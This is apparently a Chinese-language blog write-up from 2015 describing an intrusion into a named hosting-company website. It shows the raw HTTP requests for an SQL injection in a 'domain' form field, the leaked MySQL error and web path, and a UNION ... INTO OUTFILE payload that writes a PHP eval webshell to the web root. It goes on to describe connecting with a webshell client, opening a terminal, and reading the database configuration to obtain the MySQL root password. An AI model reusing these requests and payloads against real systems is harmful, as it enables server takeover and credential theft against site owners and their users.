目标:
http://bmd.yunhosting.com/

首先是对操作进行抓包 可以发现注入点存在于这里

            POST http://bmd.yunhosting.com/index.php/bmd/dosubmit HTTP/1.1
            Host: bmd.yunhosting.com
            User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:42.0) Gecko/20100101 Firefox/42.0
            Accept: */*
            Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
            Accept-Encoding: gzip, deflate
            DNT: 1
            Content-Type: application/x-www-form-urlencoded; charset=UTF-8
            X-Requested-With: XMLHttpRequest
            Referer: http://bmd.yunhosting.com/
            Content-Length: 8
            Cookie: Hm_lvt_cf15af24cbbc54d86b08019142283d7d=1447398749
            Connection: keep-alive
            Pragma: no-cache
            Cache-Control: no-cache

            domain='

可以看到返回结果是

            HTTP/1.1 500 Internal Server Error
            Date: Sat, 19 Dec 2015 05:28:23 GMT
            Server: Apache/2.2.3 (CentOS)
            X-Powered-By: PHP/5.1.6
            Content-Length: 1466
            Connection: close
            Content-Type: text/html; charset=UTF-8

            。。。。。。
                <div id="container">
                    <h1>A Database Error Occurred</h1>
                    Error Number: 1064

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”” limit 1′ at line 1

SELECT domain,type FROM common_bmd where domain = ‘======伦家是注入点========’ limit 1

Filename: /var/www/html/models/m_common.php

Line Number: 27

OK,我们用 union 开整,这里是两列,而且网站目录也有给到,所以我们已经直接构造请求写 webshell 就好= =

            POST http://bmd.yunhosting.com/index.php/bmd/dosubmit HTTP/1.1
            Host: bmd.yunhosting.com
            User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:42.0) Gecko/20100101 Firefox/42.0
            Accept: */*
            Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
            Accept-Encoding: gzip, deflate
            DNT: 1
            Content-Type: application/x-www-form-urlencoded; charset=UTF-8
            X-Requested-With: XMLHttpRequest
            Referer: http://bmd.yunhosting.com/
            Content-Length: 93
            Cookie: Hm_lvt_cf15af24cbbc54d86b08019142283d7d=1447398749
            Connection: keep-alive
            Pragma: no-cache
            Cache-Control: no-cache

            domain=' union Select 1,'< ?php eval($_POST[cmd]);?>' into outfile '/var/www/html/test2.php' #

然后,访问一下 http://bmd.yunhosting.com/test2.php ,

可以发现已经写入成功了,

微信截图_20151219133505

然后就是上菜刀,

微信截图_20151219133740

看看,可以了

微信截图_20151219133939

然后是虚拟终端 – -话说为毛同样是云主机这个的主频高一些= = 求升级我那台

微信截图_20151219134204

然后可以看到数据库的配置文件,拿到 Mysql 的 root 密码

微信截图_20151219134518

然后,进去看看

微信截图_20151219135052